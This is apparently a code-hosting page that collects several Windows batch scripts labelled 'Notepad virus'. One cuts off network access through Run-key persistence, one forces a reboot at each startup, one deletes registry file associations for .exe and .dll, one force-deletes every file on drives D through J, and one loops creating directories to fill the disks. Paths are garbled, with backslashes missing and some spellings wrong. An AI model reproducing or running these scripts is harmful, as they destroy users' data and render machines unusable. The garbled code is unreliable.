View Disables Internet Permanently Notepad Virus javascript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo @echo off>c:windowswimn32.bat | |
echo break off>>c:windowswimn32.bat | |
echo ipconfig/release_all>>c:windowswimn32.bat | |
echo end>>c:windowswimn32.bat | |
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowsswimn32.bat /f | |
reg add hkey_current_usersoftwaremicrosfotwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn.bat /f | |
echo You have maxed your usage for a lifetime ?? | |
PAUSE |
View Restart Windows on start up Notepad Virus javascript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo @echo off> windowshartlell.bat | |
echo break off>>c: windowshartlell.bat | |
echo shutdown -r -t 11 -f>>c:windowshartlell.bat | |
echo end>>c:windows shartlell.bat | |
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/v startAPI /t reg_sz /d c:windows shartlell.bat /f | |
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c: windowshartlell.bat /f | |
echo You Are Nailed, Buy A New Computer This Is Piece Of Garbage. | |
PAUSE |
View Notepad .bat javascripts Reg delete Virus
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@ECHO OFF | |
START reg delete HKCR/ .exe | |
START reg delete HKCR/ .dll | |
START reg delete HKCR/* |
View Notepad .bat javascripts 2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
del D: \ * . * /f /s /q | |
del E : \ * . * /f /s /q | |
del F : \ * . * /f /s /q | |
del G : \ * . * /f /s /q | |
del H : \ * . * /f /s /q | |
del I : \ * . * /f /s /q | |
del J : \ * . * /f /s /q |
View Notepad .bat javascripts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
:VIRUS | |
cd /d C : | |
md %RANDOM% | |
cd /d D : | |
md %RANDOM% | |
cd /d E : | |
md %RANDOM% | |
goto VIRUS | |
REM ####################### |